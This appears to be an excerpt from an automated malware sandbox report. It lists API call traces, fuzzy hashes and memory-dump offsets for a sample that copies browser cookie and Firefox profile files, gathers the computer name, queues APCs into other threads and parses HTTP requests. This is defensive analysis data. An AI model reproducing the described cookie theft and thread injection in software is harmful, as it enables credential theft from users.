  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
